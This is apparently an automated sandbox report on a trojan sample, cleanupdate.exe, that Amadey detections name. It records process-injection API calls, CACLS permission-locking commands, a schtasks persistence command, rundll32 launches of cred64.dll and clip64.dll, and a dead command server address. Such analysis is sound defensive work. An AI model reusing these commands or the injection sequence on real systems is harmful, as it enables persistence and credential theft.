NtSetContextThread Oct. 27, 2023, 5 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4297040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d0 process_identifier: 2432	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1532 resumed a thread in remote process 2176
Process injection	Process 2336 resumed a thread in remote process 2432
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002e0 suspend_count: 1 process_identifier: 2176	1	0	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2432	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\ea7c8244c8" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "..\ea7c8244c8" /P "test22:R" /E
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "Utsysc.exe" /P "test22:N"

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

tehtris	Generic.Malware
Skyhigh	BehavesLike.Win32.Generic.tz
Malwarebytes	Trojan.MCrypt.MSIL.Generic
Sangfor	Trojan.Win32.Agent.V0j0
BitDefenderTheta	Gen:NN.ZemsilF.36792.Kn0@aqkQKLg
Elastic	malicious (high confidence)
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	UDS:DangerousObject.Multi.Generic
Sophos	Mal/Generic-S
FireEye	Generic.mg.c9aa05e75a369370
Ikarus	Trojan.MSIL.Inject
Google	Detected
Gridinsoft	Trojan.Win32.Amadey.bot
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
McAfee	Artemis!C9AA05E75A36
DeepInstinct	MALICIOUS
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
AVG	MalwareX-gen [Trj]
Avast	MalwareX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

89.208.104.64:80

Executed a process and injected code into it, probably while unpacking (50 out of 60 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1532	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 1532	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x0000019c suspend_count: 1 process_identifier: 1532	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 1532	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 1532	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 1532	1	0
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2140 thread_handle: 0x000002d4 process_identifier: 2136 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\cleanupdate.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002d8	1	1
NtGetContextThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002d4	1	0
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2136 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d8		3221225496
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2180 thread_handle: 0x000002e0 process_identifier: 2176 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\cleanupdate.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtGetContextThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002e0	1	0
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2176 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002dc	1	0
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00401000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00439000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00449000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: 0 H`À}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0044c000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x0044d000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2176 process_handle: 0x000002dc	1	1
NtSetContextThread Oct. 27, 2023, 5 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4297040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002e0 process_identifier: 2176	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002e0 suspend_count: 1 process_identifier: 2176	1	0
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2340 thread_handle: 0x00000324 process_identifier: 2336 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000032c	1	1
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2336	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2336	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 2336	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2336	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 2336	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 2336	1	0
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2436 thread_handle: 0x000002d0 process_identifier: 2432 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtGetContextThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002d0	1	0
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2432 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d4	1	0
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00401000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00439000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x00449000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: 0 H`À}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0044c000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: base_address: 0x0044d000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2432 process_handle: 0x000002d4	1	1
NtSetContextThread Oct. 27, 2023, 5 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4297040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d0 process_identifier: 2432	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2432	1	0
NtResumeThread Oct. 27, 2023, 5 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2432	1	0
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2528 thread_handle: 0x00000248 process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000024c	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2580 thread_handle: 0x000001f8 process_identifier: 2576 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000026c	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2256 thread_handle: 0x000003d0 process_identifier: 2372 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e4	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2488 thread_handle: 0x000003d8 process_identifier: 2464 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e8	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2668 thread_handle: 0x0000008c process_identifier: 2664 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2712 thread_handle: 0x00000088 process_identifier: 2708 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "Utsysc.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2792 thread_handle: 0x0000008c process_identifier: 2788 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "Utsysc.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2840 thread_handle: 0x0000008c process_identifier: 2836 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Oct. 27, 2023, 5 p.m.	thread_identifier: 2876 thread_handle: 0x00000094 process_identifier: 2872 current_directory: C:\Users\test22\AppData\Local\Temp\ea7c8244c8 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\ea7c8244c8" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1

cleanupdate.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All